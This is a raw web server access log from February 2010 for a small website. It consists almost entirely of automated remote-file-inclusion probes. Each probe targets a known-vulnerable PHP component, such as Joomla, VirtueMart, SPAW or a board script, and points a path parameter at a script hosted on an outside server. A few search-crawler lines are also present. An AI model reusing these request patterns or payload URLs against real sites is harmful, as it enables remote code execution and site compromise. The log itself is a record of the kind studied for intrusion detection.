80.97.64.32 - - [18/Feb/2010:10:16:31 -0800] "GET /logs/access_100115.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [18/Feb/2010:10:16:32 -0800] "GET /logs/access_100125.log%20%20/?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:10:16:55 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sithome.com/technote6/data/board/news/id2.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:16:58 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:17:15 -0800] "GET /logs/access.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:18:14 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:18:14 -0800] "GET /logs/access_100124.log%20%20///bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:18:14 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:19:04 -0800] "GET /logs/access_100130.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:19:04 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:19:04 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:19:12 -0800] "GET /logs/access_100205.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:19:19 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:19:20 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:19:26 -0800] "GET /logs/access_100115.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [18/Feb/2010:10:19:34 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:19:35 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:19:35 -0800] "GET /logs/access_100103.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:19:35 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:10:19:51 -0800] "GET /logs/access_100118.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:20:21 -0800] "GET /logs/access_100117.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:20:21 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:20:21 -0800] "GET /admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:20:24 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:21:50 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:21:59 -0800] "GET /logs/access_100112.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:21:59 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:23:33 -0800] "GET /logs/bbs/view_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:23:33 -0800] "GET /logs/access_100202.log/bbs/view_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:23:33 -0800] "GET /bbs/view_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:10:26:00 -0800] "GET /logs/access_100205.log/bbs/view_comment.php?board_skin_path=http://partner.waawaa.com//renewal/images/mywaa/mywaa_menu5.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:10:26:02 -0800] "GET /logs/access_100202.log//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:10:26:21 -0800] "GET /logs/access_100202.log//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:10:26:55 -0800] "GET /logs/access_100206.log//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:10:27:30 -0800] "GET /logs/access_100206.log//spaw_control.class.php?spaw_root=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:29:20 -0800] "GET /logs/access_100109.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:10:29:20 -0800] "GET /logs/access_100112.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:00 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:21 -0800] "GET /logs/access.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:22 -0800] "GET /logs/access.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:36 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:32:36 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:33:01 -0800] "GET /logs/access.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:13 -0800] "GET /logs/access_100207.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:13 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:33:16 -0800] "GET /logs/access_100207.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:33:59 -0800] "GET /logs/access_100211.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:33:59 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:34:00 -0800] "GET /logs/access_100115.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:34:00 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [18/Feb/2010:10:34:17 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:34:45 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [18/Feb/2010:10:34:49 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:35:56 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:35:57 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:35:57 -0800] "GET /logs/access_100206.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:36:45 -0800] "GET /logs/access_100115.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:10:36:47 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:10:36:47 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:10:36:47 -0800] "GET /logs/access_100206.log%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [18/Feb/2010:10:37:12 -0800] "GET /downloads HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [18/Feb/2010:10:37:13 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/downloads" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.114.36 - - [18/Feb/2010:10:37:14 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/downloads" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
80.97.64.32 - - [18/Feb/2010:10:37:23 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:37:27 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:37:27 -0800] "GET /logs/access_100206.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:10:37:41 -0800] "GET /logs/access_100115.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /logs/access_100109.log%20%20//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:37:52 -0800] "GET /logs/access_100109.log%20%20//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:38:57 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:38:58 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:38:58 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:38:59 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:38:59 -0800] "GET /logs/access_100109.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:39:00 -0800] "GET /logs/access_100109.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:10:39:26 -0800] "GET /logs/access_100205.log%20%20/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:40:06 -0800] "GET /logs/access_100203.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:10:40:12 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:10:40:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:10:40:12 -0800] "GET /logs/access_100123.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:40:15 -0800] "GET /logs/access_100203.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:40:24 -0800] "GET /logs/access_100203.log%20%20//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.242.224.19 - - [18/Feb/2010:10:41:24 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:28 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:28 -0800] "GET /logs/access_100109.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:29 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:39 -0800] "GET /admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:40 -0800] "GET /logs/access_100109.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:41:43 -0800] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:41:51 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:41:51 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [18/Feb/2010:10:41:52 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [18/Feb/2010:10:42:03 -0800] "GET /logs/access_100203.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:56 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:57 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:57 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:10:42:57 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sanvan.net/new/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
